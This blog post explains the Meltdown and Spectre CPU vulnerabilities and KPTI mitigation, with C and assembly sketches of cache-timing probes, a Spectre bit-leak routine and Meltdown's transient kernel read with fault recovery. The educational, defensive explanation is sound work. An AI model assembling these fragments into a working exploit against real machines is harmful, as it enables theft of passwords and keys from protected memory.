Meltdown and Spectre Vulnerabilities Explained


This week brought some fascinating news for CPU nerds: the revelation of security vulnerabilities in the basic hardware architecture of many modern processors. The Meltdown and Spectre vulnerabilities affect virtually all modern computers, according to a sensationalist headline at The Register, which called them the “worst ever” CPU bugs. Unlike bugs in a specific software program or operating system that can be fixed with a patch, these are fundamental flaws in the very design of the CPU.

What are these vulnerabilities exactly, how do they work, and how are Meltdown and Spectre different from each other? I must have read twenty different news stories without finding a clear answer. The best I could get was that these vulnerabilities somehow involve the CPU’s use of speculative execution: an optimization trick that executes code before it’s known whether the code should really be executed, discarding the results if it’s later determined that the code wasn’t needed. But as a guy who designs custom CPUs as a hobby, I needed a better answer than that. So I started poking beyond the news headlines into the gory tech details.

What follows below is my attempt to explain Meltdown and Spectre to myself, and by extension to readers of this blog. It assumes readers already have some basic knowledge of concepts like CPU internals, caches, and operating systems. But more so than normal for this blog, I’ll be discussing details that I don’t fully understand myself, and my explanations may be flawed. If you find an error or omission, kindly post a comment and let me know.

 
Speculative Execution + Caching = Vulnerability

Both Meltdown and Spectre exploit the fact that speculatively executed code can modify the CPU cache. Even if the code is never “really” executed, meaning that it never modifies CPU registers or memory or other processor state, the cache effects of the speculatively executed code can be observed by cleverly constructed code that follows it, by testing what is and isn’t cached. Consider this example, taken from Google’s Project Zero blog:

struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  ...
}

If arr1->length is not presently in the cache, the CPU won’t immediately know whether the if clause will evaluate true or false. If it guesses true, then the if body will execute speculatively while arr1->length is fetched from main memory. Speculative execution will cause arr1->data[untrusted_offset_from_caller] to be loaded from main memory into the cache. This behavior can be leveraged in several different ways (see below) to gain information about protected regions of memory that are supposed to be private: memory owned by other processes or the kernel. The ability to observe protected memory makes it possible to read passwords, Bitcoin keys, emails, or other sensitive information.
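
To make “testing what is and isn’t cached” concrete, here’s a minimal sketch of a cache-timing probe, assuming an x86 CPU and GCC-style intrinsics. The probe_time helper name is my own invention, not part of the published attack code:

#include <stdint.h>
#include <x86intrin.h>

/* Return the approximate cycle count needed to load one byte at addr.
   A cached address loads in tens of cycles; an uncached one takes
   hundreds. The exact threshold is machine-dependent. */
static uint64_t probe_time(volatile uint8_t *addr) {
  unsigned int aux;
  uint64_t start = __rdtscp(&aux);  /* serializing timestamp read */
  (void)*addr;                      /* the load being timed */
  uint64_t end = __rdtscp(&aux);
  return end - start;
}

Real attacks compare this measurement against a calibrated threshold to decide whether a given address was cached.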

 
Spectre: Speculative Execution in Branch Prediction

The Spectre vulnerability requires getting the victim (the kernel or another process) to run specially constructed code, which then leaks information through the cache effects of speculative execution. Consider an expanded version of the previous example.

struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  unsigned long index2 = ((value&1)*0x100)+0x200;
  if (index2 < arr2->length) {
    unsigned char value2 = arr2->data[index2];
  }
}

If arr1->length is not currently in the cache, speculative execution will continue inside the body of the if clause. Either arr2->data[0x200] or arr2->data[0x300] will be fetched from main memory and cached, depending on the least significant bit of arr1->data[untrusted_offset_from_caller]. After the speculative execution has ended, the attacking user mode code can measure how much time is required to load arr2->data[0x200] and arr2->data[0x300]. Whichever one was cached will load faster, revealing whether the LSB of arr1->data[untrusted_offset_from_caller] is 0 or 1. By repeating this process with other bit masks, the attacker can eventually read all of arr1->data[untrusted_offset_from_caller]. And by choosing untrusted_offset_from_caller appropriately, the attacker can read any location in the victim’s address space.
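
Here’s a rough sketch of how an attacker might drive this, treating the vulnerable code above as an ordinary function for illustration (in the real attack it lives in the kernel or another process, and the branch predictor must first be trained by calling the victim with in-bounds offsets). The name victim_function is illustrative, and probe_time is the timing helper sketched earlier:

#include <stdint.h>
#include <x86intrin.h>

struct array { unsigned long length; unsigned char data[]; };

extern struct array *arr1, *arr2;
extern void victim_function(unsigned long offset);   /* runs the code above */
extern uint64_t probe_time(volatile uint8_t *addr);  /* earlier sketch */

/* Recover the least significant bit of arr1->data[offset]. */
static int read_lsb(unsigned long offset) {
  _mm_clflush(&arr1->length);       /* evict the length, so the bounds check
                                       must be guessed speculatively */
  _mm_clflush(&arr2->data[0x200]);  /* evict both probe lines, so only */
  _mm_clflush(&arr2->data[0x300]);  /* speculation can re-fill one of them */

  victim_function(offset);          /* speculatively touches one probe line */

  uint64_t t0 = probe_time(&arr2->data[0x200]);
  uint64_t t1 = probe_time(&arr2->data[0x300]);
  return (t1 < t0) ? 1 : 0;         /* the faster (cached) line is the bit */
}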

That’s the general idea. Some implementation details and optimization methods are described in the Project Zero blog. The blog also describes another Spectre variant exploiting speculative execution through indirect branches, which I didn’t examine.

How can a user process get the kernel to run this kind of specially-constructed code? It turns out that the Linux kernel has a feature called eBPF that’s designed for this exact purpose, presumably to allow for device drivers or socket filters or other snippets of user-provided code that need to run in the kernel. I’m assuming Windows and Mac OS have something similar. Since running arbitrary user-provided code in the kernel would be a huge security vulnerability itself, eBPF actually runs the code in an interpreter or a JIT engine. But that’s enough to exploit this vulnerability.
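
To give a flavor of the mechanism, here’s a minimal example using classic BPF, the simpler predecessor of eBPF, to attach a one-instruction socket filter on Linux. This isn’t an exploit; it just shows how code supplied by a user process ends up being executed by the kernel:

#include <stdio.h>
#include <sys/socket.h>
#include <linux/filter.h>

int main(void) {
  /* One-instruction filter program: "return 0xFFFF", i.e. accept
     every packet. */
  struct sock_filter code[] = {
    { BPF_RET | BPF_K, 0, 0, 0xFFFF },
  };
  struct sock_fprog prog = { .len = 1, .filter = code };

  int s = socket(AF_INET, SOCK_DGRAM, 0);
  if (s < 0) { perror("socket"); return 1; }

  /* The kernel validates this program, then runs it (interpreted or
     JIT-compiled) against every packet arriving on the socket. */
  if (setsockopt(s, SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) < 0) {
    perror("setsockopt");
    return 1;
  }
  printf("filter attached; the kernel now runs our code per packet\n");
  return 0;
}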

Note: after writing this post, I found a second explanation of Spectre from a group of academic researchers working independently from Google Project Zero. Their paper describes Spectre slightly differently, and discusses attacking other processes rather than the kernel. It also includes a proof-of-concept Javascript attack, in which a malicious bit of Javascript is able to read private memory from the web browser process. Relying on the fact that Javascript is typically JIT-compiled to native code, and using debug tools to examine the native output, the authors were able to iteratively tweak the Javascript source code until it produced native code containing an exploitable conditional branch of the kind shown above.

Given the proper conditions, Spectre affects essentially all modern CPUs: Intel, AMD, ARM, and others.

 
Meltdown: Exploiting Out of Order Execution

Meltdown is similar to Spectre in that both leak information through the cache from instructions that were never “really” executed. However, with Meltdown there’s no branching involved. The attack relies on the way modern CPUs optimize performance by employing out-of-order instruction execution. Depending on the availability of execution units and operand data, instructions are sometimes executed in a different order than they appear in the program, but they are retired (registers and state are updated) in order. The fact that they were executed out of order should be invisible to the program, but Meltdown shows that’s not always true. The details are described at cyber.wtf and in a separate academic paper.

When instructions are executed out of order, but aren’t yet retired, their results exist in a kind of limbo that’s very similar to speculatively executed code from branch prediction. However, it’s not clear whether this should properly be called speculative execution. The Meltdown paper refers to these as “transient instructions”, which seems like a good term.

Consider this code:

mov rax, [someKernelAddress]          ; transient read of protected kernel memory
and rax, 1                            ; isolate the least significant bit
shl rax, 8                            ; scale by 0x100 so each outcome lands in a different cache line
mov rbx, [rax + someUserModeAddress]  ; touch one of two user-mode probe lines

The first instruction should cause an exception if executed from a user mode process, because it’s an attempt to access kernel memory. However, at least on Intel architectures, it appears that the exception doesn’t occur until the instruction is actually retired. If this code executes as part of a transient instruction sequence, no exception will yet occur: the privilege violation (bypassing kernel memory protection) is ignored, and the transient read succeeds. The transient instructions that follow, which use the value that was read, will also succeed, affecting the cache state in the same way as Spectre and creating a side channel for leaking information about kernel memory.

Eventually, the first instruction will be retired and the exception will occur. The state changes from the following instructions will be discarded, because those instructions were never really executed, but their cache side effects will remain. After an exception handler resolves the exception, further code can measure how long it takes to load from someUserModeAddress vs someUserModeAddress + 0x100 (the two addresses sit in different cache lines), thereby inferring the LSB of the byte at someKernelAddress. Further iterations with different bit masks can read the other bits.
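
A practical wrinkle is surviving that exception. A common approach, sketched below with illustrative names (transient_read stands for the assembly sequence above, and probe_time is the timing helper from earlier), is to catch the SIGSEGV and jump back:

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <x86intrin.h>

static sigjmp_buf recover;

static void segv_handler(int sig) {
  (void)sig;
  siglongjmp(recover, 1);  /* resume execution after the faulting read */
}

extern uint8_t probe[2 * 0x100];  /* someUserModeAddress: two probe lines */
extern void transient_read(const void *kernel_addr);  /* the asm above */
extern uint64_t probe_time(volatile uint8_t *addr);   /* earlier sketch */

/* Recover the LSB of the byte at kernel_addr. */
static int read_kernel_lsb(const void *kernel_addr) {
  signal(SIGSEGV, segv_handler);
  _mm_clflush(&probe[0]);      /* evict both candidate cache lines */
  _mm_clflush(&probe[0x100]);

  if (sigsetjmp(recover, 1) == 0)
    transient_read(kernel_addr);  /* faults at retirement, but the
                                     transient cache effects remain */

  uint64_t t0 = probe_time(&probe[0]);
  uint64_t t1 = probe_time(&probe[0x100]);
  return (t1 < t0) ? 1 : 0;
}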

To ensure that the Meltdown code sequence executes as an out-of-order transient sequence, the cyber.wtf technique includes a long series of filler instructions ahead of it. These filler instructions all use a different execution unit than the units needed by the Meltdown sequence, and create a long chain of interdependent instructions. So the CPU must sequentially execute the filler instructions one at a time, but meanwhile it can also jump ahead and execute the Meltdown instructions out of order.

Note that “out of order” here refers to the Meltdown code being executed out of order relative to the filler instructions. The Meltdown instructions themselves are executed in order relative to each other, since each one is dependent on the previous one.

At this time, Meltdown appears to be limited to Intel CPUs only. It’s uncertain whether this is due to a fundamental difference in how Intel handles memory protection with respect to out-of-order execution, or is simply due to differences in the size of the reorder buffer between CPU vendors. In a short aside on Meltdown, the Spectre paper states “Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.” However, the Meltdown paper reports that the authors were able to observe bypassing of memory protection during out-of-order execution on ARM and AMD processors too, but were unable to construct a working exploit.

 
Impact and Mitigation

Both of these vulnerabilities are very bad, enabling user mode code to read other protected memory. However, they’re both local exploits: the attacking code must be running on the machine being attacked, so an attacker must somehow get their code onto your machine first. For this reason, the greatest risk is probably to cloud computing environments, where processes from many different people are running on the same machine, supposedly isolated from one another thanks to memory protection. But there’s also a risk in any situation where one computer runs code received from another, even inside a VM or sandbox.

It’s not clear how Spectre can be fixed in software, because it relies on CPU features that are fundamental to all modern processors. In fact, I don’t think it can be fixed in software – at least not in any general way. One web site says, “as Spectre is not easy to fix, it will haunt us for a long time.” The only good news is that convincing the kernel to run an attacker’s special code with eBPF or other methods isn’t easy. And web browsers can be patched to protect against the sort of Javascript Spectre attacks described in the research paper. But other opportunities for Spectre attacks will remain. Future CPUs may contain hardware fixes for Spectre, but they’ll likely come with a complexity and performance penalty. Maybe cache lines will have to be treated as process-specific data instead of as shared resources.

Meltdown is the more serious of these two vulnerabilities, because it happens entirely in a single user space program and doesn’t require any special code in the victim process or kernel. In the real world, this makes it much easier for an attacker to exploit. Fortunately Meltdown can be fixed at the operating system level, but the fix carries a performance penalty that may be as high as 30%.

In the Meltdown sample code, readers may have wondered how an instruction like mov rax, [someKernelAddress] could possibly work in user mode code, even speculatively, since the kernel uses a different virtual-to-physical address mapping than the user mode process. It turns out that Linux (and I assume other operating systems too) maps the kernel’s memory into the address space of every user process, for performance reasons. By keeping the kernel permanently mapped, there’s no need to flush the TLB when switching between user and kernel space, so kernel TLB entries stay valid across those switches. The processor’s MMU can normally be trusted to prevent user processes from accessing this kernel memory – except in the case we’ve just seen. The details are nicely explained in the description of a related technology named KAISER.

The “fix” is KPTI: kernel page table isolation. It ends the longstanding practice of mapping kernel memory into the address space of user processes, ensuring that mov rax, [someKernelAddress] can’t reveal any information. However, it means that the TLB must be flushed every time there’s a switch between user and kernel code. If a user process makes frequent kernel calls, the constant TLB flushing will be expensive and have a significant negative performance impact.
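
As a rough way to see that cost, a micro-benchmark like the following (my own sketch, not taken from any of the published reports) can be run before and after a KPTI-enabled kernel update to compare syscall round-trip times:

#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void) {
  const long iters = 1000000;
  struct timespec t0, t1;

  clock_gettime(CLOCK_MONOTONIC, &t0);
  for (long i = 0; i < iters; i++)
    syscall(SYS_getpid);  /* force a real user/kernel transition; glibc
                             may cache getpid(), so call it directly */
  clock_gettime(CLOCK_MONOTONIC, &t1);

  double ns = (t1.tv_sec - t0.tv_sec) * 1e9 + (t1.tv_nsec - t0.tv_nsec);
  printf("%.1f ns per syscall\n", ns / iters);
  return 0;
}

A trivial syscall like this is nearly all transition overhead, so it’s close to a worst case; real workloads see a smaller but still significant slowdown.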

 
The Future

Meltdown and Spectre are scary, not only because of what they can do themselves, but because they open a Pandora’s Box of new vulnerability types we’re sure to see more of in the future. We can no longer think about security analysis as something that gets applied to specific software programs or operating systems, examining the code and imagining it being executed instruction by instruction in an abstract environment. We must now consider the specific, highly complex CPU (often not fully documented) that runs this software, and understand the many subtle ways in which the true hardware behavior differs from the instruction-by-instruction conceptual model.

The KAISER document mentions techniques like exploiting timing differences in fault handling, observing the behavior of prefetch instructions, and forcing faults using the Intel TSX (transactional memory) instructions. This will be a new frontier for most developers, forcing them to peel back a layer of abstraction when evaluating future computer security issues. The world just got a lot more complicated.


Viewing all articles
Browse latest Browse all 164

Trending Articles